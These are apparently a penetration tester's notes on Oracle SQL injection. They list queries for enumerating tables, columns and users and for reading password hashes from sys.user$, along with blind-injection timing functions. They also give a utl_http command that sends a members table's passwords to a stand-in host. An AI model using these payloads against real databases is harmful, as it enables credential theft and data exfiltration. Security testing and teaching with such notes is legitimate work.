ORACLE SQL Injection Notes
In ORACLE you can not just SELECT stuff you have to SELECT them from some table. For this purpose you can use special table called DUAL.
i.e. SELECT 'dummydata' || 'x' FROM DUAL;
You have to close comments if you used /* comment */ style comments
Concatenation
SELECT utl_raw.concat('x','y') FROM DUAL; SELECT 'x' || 'y' FROM DUAL; SELECT 'a' || 'b' FROM DUAL; SELECT user || '-' || password FROM members;
Comments
/* comment */
Note : You have to close this comments properly otherwise you'll get syntax error.
Line comment : --
Casting
For most of the data types concatenating data with a string can do the casting automatically. SELECT 1 || 'a' FROM DUAL;
Strings without quotes
SELECT chr(110) || chr(111) FROM DUAL;
OR
SELECT utl_raw.cast_to_varchar2(TO_CHAR(110)) FROM DUAL;
Getting Stuff
Getting Tables
SELECT table_name FROM all_tables WHERE TABLESPACE_NAME='USERS'
Getting Columns
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME'
Getting Current Database Name
SELECT global_name FROM global_name
Getting Users and Passwords
SELECT name, password FROM sys.user$ where type#=1
Getting version
Select banner || '-' || (select banner from v$version where banner like 'Oracle%') from v$version where banner like 'TNS%'
Getting Current User
SELECT user FROM dual
Simple Union Query
Simulating SQL Server's TOP feature
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R <= 3;
Moving Records one by one
SELECT FIRST_NAME FROM (SELECT ROWNUM R, FIRST_NAME FROM hr.employees) WHERE R = 3;
Functions useful for Blind SQL Injetion
- BEGIN DBMS_LOCK.SLEEP(5); END; - Sleep for 5 seconds
- CHR() - Convert to Char
- ASCII() - Convert to ASCII
- SUBSTR() - Substring
- BITAND() - Bit And operation
- LOWER() - Convert to LowerCase
Doing outbound connections
- SELECT utl_http.request('http://www.example.com') FROM DUAL SELECT utl_http.request('http://www.example.com/?' || (SELECT pass FROM members) ) FROM DUAL
- SELECT HTTPURITYPE('http://www.example.com').getXML() FROM DUAL;
You can test blind SQL Injection from DNS requests (can be more reliable against egress filtering) or from actual web request.